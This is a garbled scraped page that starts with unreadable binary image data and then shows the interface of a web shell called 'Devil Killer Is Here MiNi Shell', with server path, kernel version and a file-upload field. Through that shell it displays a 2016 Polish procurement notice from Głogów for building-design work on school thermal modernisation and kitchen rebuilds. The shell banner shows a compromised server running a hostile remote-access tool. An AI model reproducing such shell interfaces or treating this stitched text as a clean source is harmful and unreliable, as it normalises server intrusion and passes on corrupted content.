JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160519/126856-N-2016.html

<p class="kh_header"><b>Głogów: Opracowanie projektów budowlanych i projektów wykonawczych wraz z uzyskaniem pozwolenia na budowę dla zadań jak niżej:

Termomodernizacja SP Nr 13 - świetlica - dokumentacja
Termomodernizacja PP Nr 5 wraz z przebudową segmentu  żywieniowego
Termomodernizacja GM Nr 1 - dokumentacja
SP Nr 12- przebudowa segmentu żywieniowego
Modernizacja segmentu żywieniowego PP Nr 6 - dokumentacja</b><br>
<b>Numer ogłoszenia: 126856 - 2016; data zamieszczenia: 19.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.bip.info.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektów budowlanych i projektów wykonawczych wraz z uzyskaniem pozwolenia na budowę dla zadań jak niżej:

Termomodernizacja SP Nr 13 - świetlica - dokumentacja
Termomodernizacja PP Nr 5 wraz z przebudową segmentu  żywieniowego
Termomodernizacja GM Nr 1 - dokumentacja
SP Nr 12- przebudowa segmentu żywieniowego
Modernizacja segmentu żywieniowego PP Nr 6 - dokumentacja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie projektów budowlanych i projektów wykonawczych wraz z uzyskaniem pozwolenia na budowę dla zadań jak niżej:

Część I -  Termomodernizacja SP Nr 13 - świetlica - dokumentacja
Część II - Termomodernizacja PP Nr 5 wraz z przebudową segmentu  żywieniowego
Część III - Termomodernizacja GM Nr 1 - dokumentacja
Cześć IV - SP Nr 12- przebudowa segmentu żywieniowego
Część V - Modernizacja segmentu żywieniowego PP Nr 6 - dokumentacja

Zamówienie obejmuje opracowanie projektu budowlanego i projektu wykonawczego wraz  z uzyskaniem pozwolenia na budowę dla niżej wymienionych zadań w zakresie jak niżej:

Część I  Termomodernizacja SP Nr 13 - świetlica - dokumentacja
W ramach zadania należy:
Wykonać inwentaryzację wraz z oceną stanu technicznego całego budynku w branży architektoniczno- budowlanej. Wykonać odkrywki   ław fundamentowych i sprawdzić  czy budynek posiada izolację poziomą.
Wykonać audyt energetyczny oraz efektywności ekologicznej
Wykonać pomiary zawilgocenia i zasolenia ścian
Po wykonaniu oceny stanu technicznego oraz wyników pomiarów zawilgocenia i zasolenia ścian jak również uzgodnienia (wytyczne) z Wojewódzkim Konserwatorem Zabytków  przedstawić propozycję technologii wykonania termomodernizacji całego budynku inwestorowi do zaakceptowania.
Termomodernizacja ma uwzględniać wymianę całej stolarki okiennej i drzwiowej (nie wymienionej) oraz zagospodarowanie terenu wokół obiektu (dojścia i dojazdy do obiektu w zakresie niezbędnym przylegającym do termomodernizowanego obiektu. Nowa stolarka powinna być jednolita z wymienioną na najniższej kondygnacji.
Uwaga:
Obiekt jest w wykazie Wojewódzkiego Konserwatora Zabytków we Wrocławiu, delegatura w Legnicy, dlatego wszelkie rozwiązanie techniczne winy być uzgodnione z Wojewódzkim Konserwatorem Zabytków.
Wykonać dokumentację projektową wielobranżową łącznie z technologią remontu z uwzględnieniem obowiązujących przepisów.
Przed przystąpieniem do projektu zasadniczego po zapoznaniu się ze szczegółowymi oczekiwaniami inwestora i użytkownika przedstawić koncepcje rozwiązania do akceptacji i dopiero po uzgodnieniu przez Inwestora rozwiązania  należy przystąpić do wykonywania projektu zasadniczego.
Projekt wykonawczy powinien uwzględniać dokładny opis i rysunki szczegółowe dobranej technologii 
Branża elektryczna: zaprojektować nową instalację odgromową przystosowaną do obecnie obowiązujących przepisów  i norm - na budynku termomodernizowanym będącym pod nadzorem konserwatorskim. Charakterystyka robot elektrycznych:
wykonać pomiary kontrolne rezystancji uziemienia
dokonać ocenę stanu technicznego instalacji odgromowej
wymienić zwody pionowe ( min.fi 8)
zwody poziome doprowadzić do należytego stanu technicznego
wymienić zaciski kontrolne
po analizie wyników pomiarów rezystancji uziemienia  (ewentualnie) wymienić    
uziemienie otokowe lub zastosować sondy
zdemontować wszystkie oprawy zewnętrzne (między innymi oświetlenia ewakuacyjnego lub urządzenia teletechniczne np. kamery monitoringu, anteny odbiorcze, czujniki ruchu itp. zamontowane na ścianach zewnętrznych budynku
po wykonaniu termomodernizacji wszystkie urządzenia (nowe) zamontować ponownie - przystosowując je do obecnie obowiązujących przepisów i norm 
Regulacja instalacji centralnego ogrzewania- dostosowanie instalacji do nowych warunków pracy po dociepleniu obiektu.
Szczegółowy zakres projektanta określony jest w SIWZ.
Część II Termomodernizacja PP Nr 5 wraz z przebudową segmentu żywieniowego
Zakres do opracowania dot. Termomodernizacji
Branża budowlana (termomodernizacja)
inwentaryzacja wraz z oceną stanu technicznego obiektu pod kątem planowanych prac.
audyt energetyczny oraz efektywności ekologicznej
ocieplanie ścian zewnętrznych elewacji budynku, z uwagi na straty ciepła
 ocieplenie ścian zewnętrznych piwnic poniżej poziomu terenu, wraz z wykonanie izolacji   pionowej ścian
ocieplenie fundamentów ścian zewnętrznych budynku w części nie podpiwniczonej,  poniżej  poziomu terenu, wraz z wykonaniem izolacji pionowej
wymiana doświetlaczy przy oknach piwnic na systemowe- remont schodów zewnętrznych i podestów, łącznie z przebudową głównego  zespołu wejściowego do budynku
wymiana wszystkich obróbek blacharskich
wymiana rynien i rur spustowych wraz z rewizjami
wymiana daszków nad wejściami do budynku, na systemowe
wymiana części drzwi zewnętrznych
wymiana drewnianej stolarki okiennej i parapetów wewnętrznych
remont przebudowa tarasów zewnętrznych 
wymiana opasek przy budynku, wraz z przyległymi chodnikami i zagospodarowaniem terenu.
remont pomieszczeń na poziomie piwnic
wymiana całej instalacji centralnego ogrzewania na nową dostosowaną do nowych parametrów po dociepleniu
wymiana zewnętrznej instalacji kanalizacji deszczowej, uwzględniając dodatkowe  odpływy np. przed wejściem z zewnątrz na poziom piwnic
 remont kominów na dachu, wraz z czapami betonowymi
docieplenie stropodachu granulatem z wełny mineralnej
Branża sanitarna:
projekt branżowy inwentaryzacji instalacji sanitarnych w całym obiekcie  
projekt branżowy instalacji centralnego ogrzewania w całym obiekcie (należy przewidzieć obudowy dla grzejników)
projekt branżowy instalacji p.poż. i wod kan w całym obiekcie (za wyjątkiem sanitariatów   
wyremontowanych w ostatnich latach) - w projekcie kanalizacji sanitarnej należy uwzględnić kanalizacje sanitarna dla węzła cieplnego ze studzienką chłodząca ponieważ obecnie miejscem zrzutu dla wody grzewczej spuszczanej w razie potrzeby z instalacji  c.o. jest studnia chłonna, która tej wody nie zbiera bo podłoże jest gliniaste,
projekt branżowy instalacji solarnej wraz z kolektorami słonecznymi dla wspomagania zasilania instalacji c.w.u w całym budynku (lokalizacja kolektorów słonecznych na dachu budynku) 
projekt branżowy automatyki instalacji solarnej
Branża elektryczna:
istniejącą instalację odgromową przystosować do nowych warunków pracy oraz    
obowiązujących przepisów i norm
charakterystyka robót
wykonać pomiary kontrolne rezystancji uziemienia
dokonać oceny stanu technicznego instalacji odgromowej
wymienić zwody pionowe ( min fi 8)
zwody poziome doprowadzić do należytego stanu technicznego
wymienić zaciski kontrolne
po analizie pomiarów - (ewentualnie) wymienić uziemienie otokowe lub 
zastosować sondy
zdemontować wszystkie oprawy zewnętrzne ( między innymi oświetlenia
ewakuacyjnego oraz urządzenia teletechniczne np. kamery monitoringu, anteny
odbiorcze, czujniki ruchu itp.) zamontowane na ścianach zewnętrznych budynku
po wykonaniu termomodernizacji wszystkie urządzenia (nowe) zamontować
ponownie  przystosowując je do obecnie obowiązujących przepisów i norm.  
Zakres do opracowania dot. przebudowy segmentu kuchennego wraz z przyległą komunikacją:
Wykonanie inwentaryzacji wielobranżowej wraz z oceną stanu technicznego części kuchennej. Ocena stanu technicznego powinna zawierać przede wszystkim informacje odnoście elementów wyburzanych (konstrukcyjne, nie konstrukcyjne) i jak będzie to miało wpływ na pozostałą cześć budynku oraz ekspertyzę dachu jeżeli miała by być na nim posadowiona centrala wentylacyjna,  klimatyzatory lub inne urządzenia.
Branża budowlano- technologiczna
Wykonanie dokumentacji projektowej wielobranżowej łącznie z jej technologią remontu wraz                              z przebudową kuchni z uwzględnieniem obowiązujących przepisów  i nowoczesnego sprzętu oraz:
zakładanej ilości 125 obiadów dziennie, 
ilość pracowników na kuchni 4 osoby
w kuchni należy zaprojektować okap kuchenny firmy Jeven
w pomieszczeniach należy zaprojektować wentylację mechaniczną z centralą z wymiennikiem krzyżowym, 
projekt nowych dźwigów windowych, lokalizacja w miejscu starych, dźwigi 
z drzwiami skrzydłowymi (wychylnymi) z możliwością wjazdu wózka kelnerskiego. 
komplet wyposażenia tzn wszystkie urządzenia, meble, drobne wyposażenie kuchni (np. garnki, patelnie, chochle itp.), kompletny serwis i sztućce
Zakres branży sanitarnej:
projekt branżowy instalacji rurowych kuchni i zaplecza (gaz, woda zimna, c.w.u. kan.san. kan. technologiczna, kan.deszcz. p.poż, centralne ogrzewanie, ciepło technologiczne dla central wentylacyjnych i klimatyzacyjnych) 
projekt branżowy wentylacji mechanicznej kuchni wraz z zapleczem
projekt branżowy automatyki wentylacji kuchni z zapleczem 
projekt branżowy instalacji alarmowej systemu detekcji gazu w kuchni 
projekt branżowy przyłącza kanalizacji sanitarnej oraz przyłącza kanalizacji technologicznej wraz z separatorem tłuszczu
projekt branżowy inwentaryzacji instalacji centralnego ogrzewania w całym obiekcie (w celu dokonania wyceny robót demontażowych)
Zakres branży elektrycznej:
zaprojektować nową rozdzielnicę zaplecza kuchennego ( RK )  wraz z przewodem zasilającym od rozdzielni głównej ( RG )  i przyłączeniem do głównej szyny uziemiającej  ( GSU )  oraz instalacje elektryczne n n 0,4 kV 
z  projektowanej rozdzielnicy ( RK ) wyprowadzić obwody elektryczne do   
obsługi zaplecza kuchennego:
instalacje oświetleniowe
instalacje gniazd wtykowych  0,23 kV ( jednofazowe )
instalacje gniazd wtykowych 0,4 kV ( trójfazowe )
instalacje elektryczne zasilające wentylacje
instalacje oświetlenia ewakuacyjnego i awaryjnego
zasilanie sterowania  systemowego wentylacji   
W ramach zadania należy:
przed przystąpieniem do projektu zasadniczego po zapoznaniu się ze szczegółowymi oczekiwaniami inwestora i użytkownika przedstawić 2 koncepcje rozwiązania technologicznego do akceptacji i dopiero po wyborze rozwiązania należy przystąpić do wykonywania projektu zasadniczego.
Projekt wykonawczy powinien uwzględniać między innymi:
poszczególne projekty branżowe oraz rysunki koordynacyjne złożeniowe wielobranżowe
wyszczególnienie wszystkich mebli i urządzeń z dokładnym opisem i rysunkiem
wykaz całego sprzętu z wszystkimi parametrami technicznymi
projekt ścian i podłóg w pomieszczeń gdzie przewidziano glazurę i terakotę
projekt wizualizacji pomieszczeń (Projektant po wcześniejszym uzgodnieniu 
z inwestorem i użytkownikiem  przedstawia 2 wizualizację do akceptacji, po wyborze rozwiązania wykonuje szczegółowe rysunki wykonawcze)
Szczegółowy zakres projektanta określony jest w SIWZ.
Część III  Termomodernizacja Gimnazjum  Nr 1- dokumentacja
Stan istniejący:
Budynek wzniesiono na początku XX w. Budynek o konstrukcji murowanej. Konstrukcja dachu drewniana, dach mansardowy kryty dachówką ceramiczną, ściany zewnętrzne ceglane
gr. 55 oraz 41 cm otynkowane. Od strony ulicy cokół obłożony okładziną kamienną, okna drewniane. Poddasze w części zaadaptowane w latach 90-tych na cele dydaktyczne, wymieniono stolarkę okienną na poddaszu oraz pokrycie dachowe.
Wytyczne ogólne:
Projekt winien obejmować    wykonanie inwentaryzacji  wraz z oceną stanu technicznego całego budynku oraz  wykonanie audytu energetycznego oraz efektywności ekologicznej.
Uwzględnić wykonanie przed zasadniczym projektem inwentaryzacji wielobranżowej                                                 z narysowanymi głównymi elementami oraz oceny stanu technicznego pod kątem planowanych prac
Przed wykonaniem zasadniczego projektu przedstawić koncepcję kolorystyki i uzgodnić                                           z Inwestorem. Zaakceptowana koncepcja jest podstawą do wykonania projektu zasadniczego.
Ujęty zakres prac musi być kompletny i tak opisany, żeby podczas wykonania prac budowlanych na podstawie projektu nie pojawiały się koszty dodatkowe
Projekt należy uzgodnić z Wojewódzkim Konserwatorem Zabytków we Wrocławiu, Delegatura                          w Legnicy.
Na płycie dołączonej do wersji papierowej załączyć:
rysunki i opisy w wersji edytowalnej (opisy otwierane w programie word, rysunki                                                      w formie dwg lub dxf dla wersji Autocad nie późniejszej niż 2010)
zeskanowany projekt z decyzji pozwolenia na budowę lub zgłoszenia  wraz z treścią decyzji, wszystkimi uzgodnieniami i projektami. Płyta powinna być dokładną kopią projektu który uzyskał pozwolenie na budowę- zeskanowane rysunki, opisy i uzgodnienia muszą być tożsame z przekazywaną wersją papierową oraz dokładną kopią projektu wykonawczego 
projekt wykonawczy powinien być doszczegółowieniem projektu budowlanego zatwierdzonego decyzjami pozwolenia na budowę lub zgłoszeniem. Elementy zawarte w projekcie wykonawczym nie mogą powodować zmian istotnych w stosunku do projektu budowlanego
Branża budowlana- roboty zewnętrzne:
od strony południowej i zachodniej wszystkie ściany do docieplenia 
od strony północnej i wschodniej docieplenie części obiektu
wyłączone z docieplenia następujące fragmenty:
elewacja północna w obrębie głównego zespołu wejściowego
część elewacji wschodniej z dużymi oknami
pas pionowy od strony północnej z balkonem oraz ozdobną attyką 
na nieocieplanej części wykonać fakturę bez docieplenia z odnowieniem                                i odtworzeniem detali
docieplenie ścian zewnętrznych wełną mineralną w systemie lekko mokrym
zachowanie istniejących detali architektonicznych oraz ich renowacja
istniejące cokoły z płyt kamiennych od strony północnej i wschodniej do piaskowani
renowacji
cokół od strony południowej i zachodniej ocieplić wełną mineralną w systemie lekko   mokrym i obłożyć płytami kamiennymi
parapety okienne zewnętrzne do wymiany na ceramiczne szkliwione
nad wejściami do budynku od strony południowej zaprojektować zadaszenia pokryte dachówką
przebudować dach nad częścią dobudowanych sanitariatów od strony południowej
przebudować schodów zewnętrznych od strony południowej wraz z likwidacją zbiornika 
p.pożarowego znajdującego się pod schodami
wymiana rynien PCV
wymiana przeciekających koszy
wymiana rur spustowych wraz z rewizjami
renowacja schodów przy wejściu głównym i elementów architektonicznych na elewacji  wraz z balkonem na elewacji północnej i elementami z metalu
wymiana starej stolarki okiennej wraz z oknem owalnym na strychu
wymiana stolarki okiennej w sali gimnastycznej
stare kraty okienne do wymiany na kute
ściany zewnętrzne wokół budynku poniżej poziomu terenu odkopać, osuszyć, wykonać 
izolację wodoszczelną i ocieplić. Przewidzieć taki sposób prowadzenia prac aby zachować w nienaruszonym stanie kamienny cokół
w wykopie wokół budynku przed zasypaniem ułożyć nowy otok instalacji odgromowej
Branża budowlana- roboty wewnętrzne:
po skuciu tynku ze ścian zewnętrznych w piwnicach, osuszeniu i wykonaniu tynków    renowacyjnych przewidzieć generalny remont piwnic
poddasze zaadaptowane w latach 90-tych na cele dydaktyczne z uwagi na niskie temperatury w okresach zimowych przewidzieć dodatkowe docieplenie stropów wraz z wykonaniem podłóg drewnianych na strychu
docieplenia wymaga pozostała część stropów poddaszy, również nad salą gimnastyczną wraz                                 z wykonaniem podłóg  
Branża budowlana- droga, chodniki, ogrodzenie
odtworzyć chodniki wokół budynku po wykonaniu termomodernizacji 
z uwagi na różnorodność nawierzchni drogi dojazdowej od strony zachodniej i placu od strony    południowej, zaprojektować nową nawierzchnię wraz z odwodnieniem oraz elementami małej architektury typu ławki, kosze na śmieci - wykonać jako odrębne zadanie dokumentacyjne z osobnymi decyzjami administracyjnymi wraz z kosztorysami, specyfikacjami, przedmiarami wg poniższego opisu
z uwagi na zły stan ogrodzenia wraz z cokołem od strony zachodniej, zaprojektować 
nowe pasujące do otoczenia - zakres niezbędny w powiązaniu z termomodernizowanym obiektem- wykonać jako odrębne zadanie dokumentacyjne z osobnymi decyzjami administracyjnymi wraz z kosztorysami, specyfikacjami, przedmiarami wg poniższego opisu
Branża elektryczna:
przebudowa instalacji odgromowej- zaprojektować nową instalację odgromową - przystosowaną do obecnie obowiązujących przepisów i norm - na budynku termomodernizowanym  będącym pod nadzorem konserwatorskim
wykonać pomiary kontrolne rezystancji uziemienia 
dokonać oceny stanu technicznego instalacji odgromowej
wymienić zwody pionowe ( min. fi 8 )
zwody poziome doprowadzić do należytego stanu technicznego
wymienić zaciski kontrolne
po analizie wyników pomiarów rezystancji uziemienia - ( ewentualnie ) wymienić  
uziemienie otokowe lub zastosować sondy
zdemontować wszystkie oprawy zewnętrzne ( między innymi oświetlenia    
ewakuacyjnego oraz urządzenia teletechniczne np. kamery monitoringu,   
anteny odbiorcze, czujniki ruchu itp.) zamontowane na ścianach   
zewnętrznych budynku 
po wykonaniu termomodernizacji  wszystkie urządzenia ( nowe ) zamontować    
ponownie - przystosowując je do obecnie obowiązujących przepisów i norm.
przeanalizowanie stanu instalacji elektrycznej w remontowanych piwnicach i 
doprojektowanie niezbędnych elementów
Szczegółowy zakres projektanta określony jest w SIWZ.
Część IV  SP Nr 12 - przebudowa segmentu żywieniowego
Wytyczne ogólne:
W ramach zamówienia wykonać inwentaryzację wielobranżową z narysowanymi głównymi elementami oraz oceny stanu technicznego pod kątem planowanych prac
Na płycie dołączonej do wersji papierowej załączyć:
rysunki i opisy w wersji edytowalnej (opisy otwierane w programie word, rysunki w formie dwg lub dxf dla wersji Autocad nie późniejszej niż 2010); kosztorysy w plikach ath. specyfikacje analogicznie do opisów 
zeskanowany projekt z decyzji pozwolenia na budowę lub zgłoszenia  wraz z treścią decyzji, wszystkimi uzgodnieniami i projektami. Płyta powinna być dokładną kopią projektu który uzyskał pozwolenie na budowę- zeskanowane rysunki, opisy i uzgodnienia muszą być tożsame z przekazywaną wersją papierową oraz dokładną kopią projektu wykonawczego 
Projekt wykonawczy powinien być doszczegółowieniem projektu budowlanego zatwierdzonego decyzjami pozwolenia na budowę lub zgłoszeniem. Elementy zawarte w projekcie wykonawczym nie mogą powodować zmian istotnych w stosunku do projektu budowlanego
Branża budowlana
Wykonanie inwentaryzacji wraz z oceną stanu technicznego skrzydła szkoły w której znajduje się segment żywieniowy wraz z jadalnią oraz świetlica na II piętrze. Ocena stanu technicznego powinna zawierać przede wszystkim informacje odnośnie elementów wyburzanych (konstrukcyjne czy nie konstrukcyjne) i jaki to będzie miało wpływ na pozostałą cześć budynku oraz ekspertyzę dachu jeżeli miała by być na nim posadowiona centrala wentylacyjna,  klimatyzatory lub inne urządzenia.
Uwaga:
W pomieszczeniu jadalni oraz w świetlicach należy tak uwzględnić trasy sieci oraz zakres prac aby nie zniszczyć istniejącej nowej wykładziny w jadalni oraz w jak najmniejszym stopniu zniszczyć pomieszczenia świetlicy. W pomieszczeniach gdzie będą wykonywane jakiekolwiek prace budowlane należy całe te pomieszczenia uwzględnić do odświeżenia.
Wykonanie dokumentacji projektowej wielobranżowej remontu wraz z przebudową segmentu kuchennego łącznie z technologią kuchni z uwzględnieniem obowiązujących przepisów i nowoczesnego sprzętu oraz:
zakładana ilość 450 obiadów dziennie, 
ilość pracowników na kuchni 7 osób + 1 intendent
w kuchni należy zaprojektować okap kuchenny firmy Jeven
w pomieszczeniach należy zaprojektować wentylację mechaniczną z odzyskiem ciepła z centralą                         z wymiennikiem krzyżowym oraz mechaniczną nawiewno- wywiewną zgodnie z wymaganiami,                         w jadalni klimatyzacją oraz zaprojektować prawidłową wymianę powietrza w świetlicy wraz                                     z chłodzeniem
projekt dwóch nowych dźwigów windowych, lokalizacja w miejscu starych, oba dźwigi z drzwiami skrzydłowymi (wychylnymi) z możliwością wjazdu wózka kelnerskiego. 
komplet wyposażenia tzn wszystkie urządzenia, meble, drobne wyposażenie kuchni (np. garnki, patelnie, chochle itp.), serwis i sztućce
Przed przystąpieniem do projektu zasadniczego po zapoznaniu się ze szczegółowymi oczekiwaniami inwestora i użytkownika przedstawić 2 koncepcje rozwiązania technologicznego do akceptacji i dopiero po wyborze rozwiązania należy przystąpić do wykonywania projektu zasadniczego. Zaakceptowana koncepcja jest podstawą do wykonywania projektu zasadniczego
Projekt wykonawczy powinien uwzględniać zakres między innymi:
wyszczególnienie wszystkich mebli z dokładnym opisem i rysunkiem
wykaz całego sprzętu z wszystkimi parametrami technicznymi
projekt ścian i podłóg w pomieszczeń gdzie przewidziano glazurę i terakotę
projekt wizualizacji pomieszczeń (Projektant po wcześniejszym uzgodnieniu z inwestorem                                          i użytkownikiem  przedstawia 2 wizualizację do akceptacji, po wyborze rozwiązania wykonuje szczegółowe rysunki wykonawcze)
rysunki koordynacyjne zawierające wszystkie branże 
Branża sanitarna:
Projekt branżowy inwentaryzacji instalacji sanitarnych oraz wentylacji  kuchni, zaplecza  i stołówki oraz świetlicy zlokalizowanej nad kuchnią - Projekt branżowy instalacji rurowych kuchni i zaplecza (gaz, woda zimna, c.w.u., kan.san., kan. technologiczna, kan.deszcz., p.poż, centralne ogrzewanie, ciepło technologiczne dla central wentylacyjnych i klimatyzacyjnych) 
Projekt branżowy wentylacji mechanicznej kuchni, zaplecza oraz świetlicy (lokalizacja      
centrali w obecnej wentylatorni zlokalizowanej w piwnicach lub na dachu budynku na podstawie konstrukcyjnej)
Projekt branżowy klimatyzacji stołówki (lokalizacja centrali w obecnej wentylatorni   zlokalizowanej      w piwnicach lub na dachu budynku na podstawie konstrukcyjnej) Projekt branżowy automatyki wentylacji kuchni z zapleczem oraz świetlicy
Projekt branżowy automatyki klimatyzacji stołówki
Projekt branżowy instalacji alarmowej systemu detekcji gazu w kuchni 
Projekt branżowy przyłącza kanalizacji sanitarnej oraz przyłącza kanalizacji technologicznej wraz             z separatorem tłuszczu
Projekt branżowy inwentaryzacji instalacji centralnego ogrzewania (w celu dokonania wyceny robót demontażowych) Projekt branżowy instalacji centralnego ogrzewania (należy przewidzieć obudowy dla grzejników w częściach komunikacyjnych oraz w świetlicy i stołówce)
Wykonanie dwóch koncepcji w/w instalacji (m.in. z wersją umieszczenia central wentylacyjnej                            i klimatyzacyjnej w obecnej wentylatorni lub drug wariant z umieszczeniem w/w central na dachu budynku na podstawach dachowych zgodnie z obliczeniami konstrukcyjnymi z uwzględnieniem odkrywek stropu na dachu budynku)
Branża elektryczna:
zaprojektować nową rozdzielnicę zaplecza kuchennego ( RK )  wraz z przewodem zasilającym od rozdzielni głównej ( RG )  i przyłączeniem do głównej szyny uziemiającej  
( GSU )  oraz instalacje elektryczne n/n 0,4 kV 
Z projektowanej rozdzielnicy ( RK ) wyprowadzić obwody elektryczne do  obsługi zaplecza kuchennego:
instalacje oświetleniowe
instalacje gniazd wtykowych  0,23 kV ( jednofazowe )
instalacje gniazd wtykowych 0,4 kV ( trójfazowe )
instalacje elektryczne zasilające wentylacje
instalacje oświetlenia ewakuacyjnego i awaryjnego
zasilanie sterowania  systemowego wentylacji   
Szczegółowy zakres projektanta określony jest w SIWZ.
